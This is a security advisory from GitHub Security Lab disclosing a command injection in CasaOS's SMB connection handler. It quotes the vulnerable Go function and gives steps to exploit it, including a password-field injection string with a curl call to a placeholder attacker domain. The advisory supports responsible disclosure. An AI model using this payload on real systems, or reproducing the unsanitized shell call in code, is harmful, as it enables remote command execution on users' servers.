Coordinated Disclosure Timeline

Summary

If an authenticated user using CasaOS is able to successfully connect to a controlled SMB server, they are able to execute arbitrary commands.

Product

CasaOS

Tested Version

v3.7-1

Details

Issue: command injection in PostSambaConnectionsCreate (GHSL-2022-119)

The MountSmaba function is called by PostSambaConnectionsCreate with none of the inputs sanitized. The parameters are used to confirm an SMB share can be authenticated, but if malicious parameters are valid on the SMB end, command injection is possible.

func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {
	str := command2.ExecResultStr("source " + config.AppInfo.ShellPath + "/helper.sh ;MountCIFS " + username + " " + host + " " + directory + " " + port + " " + mountPoint + " " + password)
	return str
}

Impact

This issue may lead to Command Injection.

Resources

In this exploit, we will exploit the password parameter.

  1. Create a SMB share with any path, any share name, and any username.
  2. Set the password of the user to be ;CMD=$'\x20arg1';command$CMD

    For example, if I wanted to access a website, I could do ;CMD=$'\x20attackerdomain.com';curl$CMD

  3. Go to Files->Location->Connect Network Storage and Enter the share path, username, password and your command should execute.

CVE

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings) and found with the help of the go/command-injection CodeQL query.

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-119 in any communication regarding this issue.